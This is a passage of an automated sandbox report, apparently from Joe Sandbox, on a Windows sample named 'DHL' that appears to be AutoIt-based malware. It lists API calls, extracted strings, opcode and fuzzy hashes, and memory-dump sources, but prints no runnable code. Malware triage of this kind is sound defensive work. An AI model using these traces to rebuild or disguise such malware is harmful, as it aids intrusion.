                                                        • Instruction ID: 22e6226735c862f5d0d45892d4ea439c1e5ba036879840512e62bd32f7d03ce5
                                                        • Opcode Fuzzy Hash: 7b0f7bc74a1935438c8f1969f955a3d1432b40950031e76025d0aeb2a7a9d57c
                                                        • Instruction Fuzzy Hash: 8C418D712143059FDB20DF25E884B5ABBE4AF85320F148B1DF9A59B2D1D730A904CB62
                                                        APIs
                                                        • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,00A3CC08,00000000,?,?,?,?), ref: 00A344AA
                                                        • GetWindowLongW.USER32 ref: 00A344C7
                                                        • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00A344D7
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1464884217.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                                                        • Associated: 00000000.00000002.1464868271.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465133098.0000000000A6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465163033.0000000000A74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_9a0000_DHL.jbxd
                                                        Similarity
                                                        • API ID: Window$Long
                                                        • String ID: SysTreeView32
                                                        • API String ID: 847901565-1698111956
                                                        • Opcode ID: 9b9216c7d077ad221c14d9852800c3930ef6ac89d5bf7ab4105e44da77ddb6f1
                                                        • Instruction ID: 7aa0b98e65ab126d8184fddd336255a3b23c4b82b737f6b26eb1b99bf8119fff
                                                        • Opcode Fuzzy Hash: 9b9216c7d077ad221c14d9852800c3930ef6ac89d5bf7ab4105e44da77ddb6f1
                                                        • Instruction Fuzzy Hash: F0319A32210605AFDB209F78DC46BEA7BA9EB49334F208725F979A21E1D770EC519B50
                                                        APIs
                                                          • Part of subcall function 00A2335B: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,?,?,00A23077,?,?), ref: 00A23378
                                                        • inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 00A2307A
                                                        • _wcslen.LIBCMT ref: 00A2309B
                                                        • htons.WSOCK32(00000000,?,?,00000000), ref: 00A23106
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1464884217.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                                                        • Associated: 00000000.00000002.1464868271.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465133098.0000000000A6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465163033.0000000000A74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_9a0000_DHL.jbxd
                                                        Similarity
                                                        • API ID: ByteCharMultiWide_wcslenhtonsinet_addr
                                                        • String ID: 255.255.255.255
                                                        • API String ID: 946324512-2422070025
                                                        • Opcode ID: 3137d8357e0aff7de3c20bdeca9ef0e46e356942f5d3c4be49cd0bd53ea10ded
                                                        • Instruction ID: c6b53737a23c3490b37c3009a204bb2941ac37c66ce114c77e55c8237a4b5bd5
                                                        • Opcode Fuzzy Hash: 3137d8357e0aff7de3c20bdeca9ef0e46e356942f5d3c4be49cd0bd53ea10ded
                                                        • Instruction Fuzzy Hash: C631C1362042219FCF10CF6CD985EA977A0EF56318F248169E9158B392CB39DE41C760
                                                        APIs
                                                        • SendMessageW.USER32(00000000,00001009,00000000,?), ref: 00A33F40
                                                        • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 00A33F54
                                                        • SendMessageW.USER32(?,00001002,00000000,?), ref: 00A33F78
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1464884217.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                                                        • Associated: 00000000.00000002.1464868271.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465133098.0000000000A6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465163033.0000000000A74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_9a0000_DHL.jbxd
                                                        Similarity
                                                        • API ID: MessageSend$Window
                                                        • String ID: SysMonthCal32
                                                        • API String ID: 2326795674-1439706946
                                                        • Opcode ID: 2d52a27027940c1ccd35ebab0b545c20611717c013f31b2f609c9d51d82024d3
                                                        • Instruction ID: acffb15bc8519911832c5109de8236cf5bcbe25c00a0b8713fb168b72bae2401
                                                        • Opcode Fuzzy Hash: 2d52a27027940c1ccd35ebab0b545c20611717c013f31b2f609c9d51d82024d3
                                                        • Instruction Fuzzy Hash: BB21BC33600219BFDF21CF90DC46FEA3BB9EF88724F110214FA15AB1D0D6B5A8918B90
                                                        APIs
                                                        • SendMessageW.USER32(00000000,00000469,?,00000000), ref: 00A34705
                                                        • SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 00A34713
                                                        • DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 00A3471A
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1464884217.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                                                        • Associated: 00000000.00000002.1464868271.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465133098.0000000000A6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465163033.0000000000A74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_9a0000_DHL.jbxd
                                                        Similarity
                                                        • API ID: MessageSend$DestroyWindow
                                                        • String ID: msctls_updown32
                                                        • API String ID: 4014797782-2298589950
                                                        • Opcode ID: d3cbec2fe70636ed7996862dfb63456526507d5d8545955c59e762f358d4d1e8
                                                        • Instruction ID: cd44a381dd7452bd261ee4432e4ba586446cc05d66639d3f3f1c1f1dba8d4626
                                                        • Opcode Fuzzy Hash: d3cbec2fe70636ed7996862dfb63456526507d5d8545955c59e762f358d4d1e8
                                                        • Instruction Fuzzy Hash: B0215EB5600208AFEB11DF68DC81DA737ADEB8A3A4B040059FA049B251DB74FC52CA60
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1464884217.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                                                        • Associated: 00000000.00000002.1464868271.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465133098.0000000000A6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465163033.0000000000A74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_9a0000_DHL.jbxd
                                                        Similarity
                                                        • API ID: _wcslen
                                                        • String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
                                                        • API String ID: 176396367-2734436370
                                                        • Opcode ID: 44279700399df39edf5ae34e3dfbbb9de91849d555c9a13987f98a63d5529b5b
                                                        • Instruction ID: 34a41e4c3ed5698c328cc05459d4dbf83e5ea26d0858fea7cd0aa411740b54e4
                                                        • Opcode Fuzzy Hash: 44279700399df39edf5ae34e3dfbbb9de91849d555c9a13987f98a63d5529b5b
                                                        • Instruction Fuzzy Hash: 1A215B72A045156AD331BB25AC03FB7B3E8AF91310F50442AF949970C3EB52AD45C2D6
                                                        APIs
                                                        • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 00A33840
                                                        • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 00A33850
                                                        • MoveWindow.USER32(00000000,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00A33876
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1464884217.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                                                        • Associated: 00000000.00000002.1464868271.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465133098.0000000000A6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465163033.0000000000A74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_9a0000_DHL.jbxd
                                                        Similarity
                                                        • API ID: MessageSend$MoveWindow
                                                        • String ID: Listbox
                                                        • API String ID: 3315199576-2633736733
                                                        • Opcode ID: 2cf53d65aee9f6c5523b2e9ec0a2d7c055f22881e06bbaff20edcb9a54440e13
                                                        • Instruction ID: 100a19af3575e713339707f978febcd0764a0a8744b5d30956aff3ec4d680c0f
                                                        • Opcode Fuzzy Hash: 2cf53d65aee9f6c5523b2e9ec0a2d7c055f22881e06bbaff20edcb9a54440e13
                                                        • Instruction Fuzzy Hash: BC219F72614218BBEF21CF95DC85FBB376EEF89764F118124F9049B190CA75DC5287A0
                                                        APIs
                                                        • SetErrorMode.KERNEL32(00000001), ref: 00A14A08
                                                        • GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 00A14A5C
                                                        • SetErrorMode.KERNEL32(00000000,?,?,00A3CC08), ref: 00A14AD0
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1464884217.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                                                        • Associated: 00000000.00000002.1464868271.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465133098.0000000000A6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465163033.0000000000A74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_9a0000_DHL.jbxd
                                                        Similarity
                                                        • API ID: ErrorMode$InformationVolume
                                                        • String ID: %lu
                                                        • API String ID: 2507767853-685833217
                                                        • Opcode ID: e79aefcfb8b3e627672c1a0c69bbab262c3ad86886f9897bbe0b2c7feee52b18
                                                        • Instruction ID: 61f55d90850828ceebbe1355922a21aee458739f6dc42824f84a5cab1bd25d87
                                                        • Opcode Fuzzy Hash: e79aefcfb8b3e627672c1a0c69bbab262c3ad86886f9897bbe0b2c7feee52b18
                                                        • Instruction Fuzzy Hash: 07319375A00108AFDB10DF98C881EAABBF8FF49314F148094F509DB252D771ED45CBA1
                                                        APIs
                                                        • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 00A3424F
                                                        • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 00A34264
                                                        • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00A34271
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1464884217.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                                                        • Associated: 00000000.00000002.1464868271.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465133098.0000000000A6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465163033.0000000000A74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_9a0000_DHL.jbxd
                                                        Similarity
                                                        • API ID: MessageSend
                                                        • String ID: msctls_trackbar32
                                                        • API String ID: 3850602802-1010561917
                                                        • Opcode ID: a623dfe4f16b9c54ca3f54b8e8e9038ace9c541df30518d3e6b9f99943aca717
                                                        • Instruction ID: c5cf33e9d88ea0cc2267f2beb504a0c888b2d3d9f9c28105d334c4fbe5da924f
                                                        • Opcode Fuzzy Hash: a623dfe4f16b9c54ca3f54b8e8e9038ace9c541df30518d3e6b9f99943aca717
                                                        • Instruction Fuzzy Hash: 6511C671240248BFEF209F69CC46FEB3BACEF99B64F110614FA55E60A0D671EC519B50
                                                        APIs
                                                          • Part of subcall function 009A6B57: _wcslen.LIBCMT ref: 009A6B6A
                                                          • Part of subcall function 00A02DA7: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 00A02DC5
                                                          • Part of subcall function 00A02DA7: GetWindowThreadProcessId.USER32(?,00000000), ref: 00A02DD6
                                                          • Part of subcall function 00A02DA7: GetCurrentThreadId.KERNEL32 ref: 00A02DDD
                                                          • Part of subcall function 00A02DA7: AttachThreadInput.USER32(00000000,?,00000000,00000000), ref: 00A02DE4
                                                        • GetFocus.USER32 ref: 00A02F78
                                                          • Part of subcall function 00A02DEE: GetParent.USER32(00000000), ref: 00A02DF9
                                                        • GetClassNameW.USER32(?,?,00000100), ref: 00A02FC3
                                                        • EnumChildWindows.USER32(?,00A0303B), ref: 00A02FEB
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1464884217.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                                                        • Associated: 00000000.00000002.1464868271.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465133098.0000000000A6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465163033.0000000000A74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_9a0000_DHL.jbxd
                                                        Similarity
                                                        • API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows_wcslen
                                                        • String ID: %s%d
                                                        • API String ID: 1272988791-1110647743
                                                        • Opcode ID: 460d0f41779b0fc0a208610d5a35257760769fc2b04131787b3afc556df4da9e
                                                        • Instruction ID: f035b9e6ede07a8b5b0dfb9aae152ad13ee15052985d2fe60f9da398683ab2ad
                                                        • Opcode Fuzzy Hash: 460d0f41779b0fc0a208610d5a35257760769fc2b04131787b3afc556df4da9e
                                                        • Instruction Fuzzy Hash: 5E11A2726002096BCF15BFB0AD9AFED776AAF84314F049075B909AB192DF309A458B70
                                                        APIs
                                                        • GetMenuItemInfoW.USER32(?,?,?,00000030), ref: 00A358C1
                                                        • SetMenuItemInfoW.USER32(?,?,?,00000030), ref: 00A358EE
                                                        • DrawMenuBar.USER32(?), ref: 00A358FD
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1464884217.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                                                        • Associated: 00000000.00000002.1464868271.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465133098.0000000000A6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465163033.0000000000A74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_9a0000_DHL.jbxd
                                                        Similarity
                                                        • API ID: Menu$InfoItem$Draw
                                                        • String ID: 0
                                                        • API String ID: 3227129158-4108050209
                                                        • Opcode ID: a6869f522d82aa5bb70308687813c1f2ff2114ed2094a2803e73bb95e8f3b66c
                                                        • Instruction ID: a872f296a3e3d8d31224a4b2db0f91581eb51c73f9415c4a45e4ae3e8252784b
                                                        • Opcode Fuzzy Hash: a6869f522d82aa5bb70308687813c1f2ff2114ed2094a2803e73bb95e8f3b66c
                                                        • Instruction Fuzzy Hash: BD016932900218EFDB219F65DC45BEEBBB5FB85360F1080A9F849E6151DB308A94EF21
                                                        APIs
                                                        • GetProcAddress.KERNEL32(?,GetSystemWow64DirectoryW), ref: 009FD3BF
                                                        • FreeLibrary.KERNEL32 ref: 009FD3E5
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1464884217.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                                                        • Associated: 00000000.00000002.1464868271.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465133098.0000000000A6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465163033.0000000000A74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_9a0000_DHL.jbxd
                                                        Similarity
                                                        • API ID: AddressFreeLibraryProc
                                                        • String ID: GetSystemWow64DirectoryW$X64
                                                        • API String ID: 3013587201-2590602151
                                                        • Opcode ID: 4692f45794c50cc1a52ad0fd9945526b76797a783e0219237232a3059addc98d
                                                        • Instruction ID: e11880a7633f3cc0fb58d04a1d5b7904d8871579336c15dbcfffc329b65628cb
                                                        • Opcode Fuzzy Hash: 4692f45794c50cc1a52ad0fd9945526b76797a783e0219237232a3059addc98d
                                                        • Instruction Fuzzy Hash: F8F055318077289BE73097208C489BD732ABF00B20B50CA49F326F5098E7B4C840EBC3
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1464884217.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                                                        • Associated: 00000000.00000002.1464868271.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465133098.0000000000A6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465163033.0000000000A74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_9a0000_DHL.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: cad787da2e9dd8943c59a43af7a1b709dd09c55d7ae7ab8fc72afafe512fa00c
                                                        • Instruction ID: afc4480c20c54bdc36b731e2c45d4260f9408e4d1778a8d16185e1188c3eea31
                                                        • Opcode Fuzzy Hash: cad787da2e9dd8943c59a43af7a1b709dd09c55d7ae7ab8fc72afafe512fa00c
                                                        • Instruction Fuzzy Hash: 09C13975A0020AAFDB15CFA8D894FAEB7B5FF48304F118598E505EB291D731EE41DB90
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1464884217.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                                                        • Associated: 00000000.00000002.1464868271.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465133098.0000000000A6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465163033.0000000000A74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_9a0000_DHL.jbxd
                                                        Similarity
                                                        • API ID: __alldvrm$_strrchr
                                                        • String ID:
                                                        • API String ID: 1036877536-0
                                                        • Opcode ID: 190bec492484a18a97fe5f025dcdb3e473ceac46589bc02d4dbe4f94f5be8f6e
                                                        • Instruction ID: 33038cf06460334401a512373d31b5f9a1c29c259da2d0f0339d7f9394041c15
                                                        • Opcode Fuzzy Hash: 190bec492484a18a97fe5f025dcdb3e473ceac46589bc02d4dbe4f94f5be8f6e
                                                        • Instruction Fuzzy Hash: 2AA12771D843869FEB25CF18C8917AEBBE9EF61350F18C16EE5859B381C2388D81C751
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1464884217.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                                                        • Associated: 00000000.00000002.1464868271.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465133098.0000000000A6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465163033.0000000000A74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_9a0000_DHL.jbxd
                                                        Similarity
                                                        • API ID: Variant$ClearInitInitializeUninitialize
                                                        • String ID:
                                                        • API String ID: 1998397398-0
                                                        • Opcode ID: 354fea0635f2b4d6897083c29971811b9b6143d916f69663c7bed6a83fe365a3
                                                        • Instruction ID: 22da6fb93fe601b14081b8a8d9b1d70f4b93771fbc5643c5076be32ef2cbe0e8
                                                        • Opcode Fuzzy Hash: 354fea0635f2b4d6897083c29971811b9b6143d916f69663c7bed6a83fe365a3
                                                        • Instruction Fuzzy Hash: 3AA13E756043109FCB10EF68D985A2AB7E5FF89714F04885DF98A9B362DB34EE01CB91
                                                        APIs
                                                        • ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,00A3FC08,?), ref: 00A005F0
                                                        • CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,00A3FC08,?), ref: 00A00608
                                                        • CLSIDFromProgID.OLE32(?,?,00000000,00A3CC40,000000FF,?,00000000,00000800,00000000,?,00A3FC08,?), ref: 00A0062D
                                                        • _memcmp.LIBVCRUNTIME ref: 00A0064E
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1464884217.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                                                        • Associated: 00000000.00000002.1464868271.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465133098.0000000000A6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465163033.0000000000A74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_9a0000_DHL.jbxd
                                                        Similarity
                                                        • API ID: FromProg$FreeTask_memcmp
                                                        • String ID:
                                                        • API String ID: 314563124-0
                                                        • Opcode ID: 82e2b452b1e4a61be99702dbe8d79c54dbf5e296fadcb672997dc36c622a869a
                                                        • Instruction ID: b4cc2244f21bbd79c9286a40e7e0254f78e89aa1d5ebe5be59c4844ec2619115
                                                        • Opcode Fuzzy Hash: 82e2b452b1e4a61be99702dbe8d79c54dbf5e296fadcb672997dc36c622a869a
                                                        • Instruction Fuzzy Hash: 8381EB75A00109EFCB04DF94D984EEEB7B9FF89315F208558F516AB290DB71AE06CB60
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1464884217.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                                                        • Associated: 00000000.00000002.1464868271.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465133098.0000000000A6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465163033.0000000000A74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_9a0000_DHL.jbxd
                                                        Similarity
                                                        • API ID: _free
                                                        • String ID:
                                                        • API String ID: 269201875-0
                                                        • Opcode ID: faf4dc2da5f740c8a0416ffdccfadebca0b5ab487ecda08008866380af38ec5e
                                                        • Instruction ID: 20f2c20ab818698f4bfe70569b5bfc5818aa8749b9f7ff4ee98c0ec45d356f40
                                                        • Opcode Fuzzy Hash: faf4dc2da5f740c8a0416ffdccfadebca0b5ab487ecda08008866380af38ec5e
                                                        • Instruction Fuzzy Hash: A0413031A005516BDB277BBA8C45BBE3BA9EF81370F144626F415D63E2F6344C419762
                                                        APIs
                                                        • GetWindowRect.USER32(00D9EE38,?), ref: 00A362E2
                                                        • ScreenToClient.USER32(?,?), ref: 00A36315
                                                        • MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,?,?,?), ref: 00A36382
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1464884217.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                                                        • Associated: 00000000.00000002.1464868271.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465133098.0000000000A6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465163033.0000000000A74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_9a0000_DHL.jbxd
                                                        Similarity
                                                        • API ID: Window$ClientMoveRectScreen
                                                        • String ID:
                                                        • API String ID: 3880355969-0
                                                        • Opcode ID: 4729a2b09823804314bcba89a6e1fea8d6bfa8facf8d2a5d8dba855c8b6605ee
                                                        • Instruction ID: f11855e96db07c97d8279ed463a9abac02fb31e0cbf08d390765295a311239ca
                                                        • Opcode Fuzzy Hash: 4729a2b09823804314bcba89a6e1fea8d6bfa8facf8d2a5d8dba855c8b6605ee
                                                        • Instruction Fuzzy Hash: 86512B75A00209EFDF10DFA8D981AAE7BB5FF45360F108169F9659B2A0D730ED81CB90
                                                        APIs
                                                        • socket.WSOCK32(00000002,00000002,00000011), ref: 00A21AFD
                                                        • WSAGetLastError.WSOCK32 ref: 00A21B0B
                                                        • #21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 00A21B8A
                                                        • WSAGetLastError.WSOCK32 ref: 00A21B94
                                                        Memory Dump Source
